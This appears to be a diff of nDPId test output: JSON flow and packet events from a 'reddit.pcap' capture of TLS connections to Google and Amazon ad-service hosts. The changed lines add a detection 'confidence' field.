 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="}
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="}
 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="}
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00989{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="}
-00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="}
-00977{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}}
+01003{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01044{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
